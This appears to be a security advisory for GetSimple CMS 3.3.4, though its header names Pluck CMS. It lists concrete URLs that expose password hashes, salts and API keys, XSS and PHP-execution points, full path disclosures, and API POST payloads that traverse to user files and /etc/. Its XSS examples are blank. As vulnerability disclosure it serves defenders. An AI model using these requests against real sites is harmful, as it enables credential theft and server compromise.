Pluck CMS: http://get-simple.info/ Version: 3.3.4 By Ross Marks: http://www.rossmarks.co.uk OSVDB Creditee: http://osvdb.org/creditees/13991-ross-marks 1. SHA1 password (and other sensitive information) disclosure if you know the name of a user visit either: http://website.com/GetSimpleCMS/data/users/.xml <-- password http://website.com/GetSimpleCMS/backups/users/.xml.bak <-- password http://website.com/GetSimpleCMS/data/other/authorization.xml <-- for salt http://website.com/GetSimpleCMS/data/other/appid.xml <-- API key 2. Persistant XSS (requires access) Title, Tags, Menu Text, Meta description are all vulnerable to XSS i.e. "> page content is also vulnerable by clicking the source button and editing it directly i.e. 3. PHP code execution (requires access) Directly type PHP at: http://website.com/GetSimpleCMS/admin/theme-edit.php 4. Full Path Disclosure visit: http://website.com/GetSimpleCMS/plugins/anonymous_data.php to get: Fatal error: Call to undefined function i18n_merge() in /path/to/GetSimpleCMS/plugins/anonymous_data.php on line 14 or http://website.com/GetSimpleCMS/plugins/InnovationPlugin.php to get: Notice: Use of undefined constant GSDATAOTHERPATH - assumed 'GSDATAOTHERPATH' in /path/to/GetSimpleCMS/plugins/InnovationPlugin.php on line 12 Fatal error: Call to undefined function i18n_merge() in /path/to/GetSimpleCMS/plugins/InnovationPlugin.php on line 15 5. API Vulnerabilities since you can read the api key it's fairly trivial to exploit the site with this. here are some examples (all POST data) to: http://website.com/GetSimpleCMS/admin/api.php 1. Discover usernames: data= ABC123456 all_files_read ../../data/users/ 2. Read user settings file (includes password hash) data= ABC123456 page_read ../../data/users/!!USERNAME!! 3. Local file inclusion data= ABC123456 all_files_read ../../../../../../etc/